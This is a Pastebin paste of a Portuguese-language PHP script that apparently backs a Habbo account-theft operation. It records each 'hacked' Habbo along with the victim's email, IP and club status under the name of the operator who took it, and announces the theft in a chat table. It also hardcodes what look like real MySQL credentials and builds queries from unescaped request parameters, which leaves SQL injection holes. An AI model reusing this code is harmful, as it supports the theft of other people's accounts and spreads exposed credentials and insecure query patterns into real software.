Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- $mysql_host = "localhost";
- $mysql_user = "myhbxcoc";
- $mysql_password = "eX290sed3V";
- $mysql_database = "myhbxcoc_hbx";
- mysql_connect($mysql_host,$mysql_user,$mysql_password) or die(mysql_error());
- mysql_select_db($mysql_database);
- @date_default_timezone_set("America/Fortaleza");
- @session_start();
- if((time() - $_SESSION['flood'])>0) {
- unset($_SESSION['flood']);
- }
- $query = mysql_query("select * from `hbx_securityTokens` where token = '".$_GET['token']."'");
- $query = mysql_fetch_array($query);
- if(empty($query)) {
- die("<b style=color:red>XSRF Detected</b><br><br>Uma tentativa de explorar falha foi detectada [X-TOKEN INVALIDO]");
- }
- mysql_query("delete from `hbx_securityTokens` where token = '".$_GET['token']."'");
- $hbx_id = addslashes($_GET['hid']);
- isset($_SESSION['flood'])? die("Anti-Flood!") : $_SESSION['flood'] = time()+25;
- $query = @mysql_query("select * from hbx_users where id='".addslashes($_GET['id'])."' and hbx_id = '$hbx_id'") or die(mysql_error());
- $dados = mysql_fetch_array($query);
- if($dados['nick']=="") die("Id não existe.");
- $nick = $dados['nick'];
- $mail = addslashes(strip_tags($_GET['email']));
- $date = date("d/m/Y h:i:s");
- $ip = $_SERVER['REMOTE_ADDR'];
- $habbo = htmlspecialchars($_GET['h']);
- if(!$habbo||$habbo == "null") die("Sem habbo.");
- $n_ick = "» BotHBX";
- $msg = "<font color=orange>o Habbo <b>$habbo</b> foi hackeado por <b>$nick</b>!</font>";
- $suc = @mysql_query("INSERT INTO `hbx_chat` (`id`, `nick`, `message`, `del`,`hbx_id`) VALUES ('', '$n_ick', \"$msg\", '0','$hbx_id');") or die(mysql_error());
- echo "S=".mysql_query("INSERT INTO `hbx_logs` (`id` ,
- `owner` ,
- `email` ,
- `habbo`,
- `date` ,
- `ip`,
- `hbx_id`,
- `club`
- )
- VALUES (
- NULL , '$nick', '$mail', '$habbo', '$date', '$ip','$hbx_id','".$_GET['club']."');");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement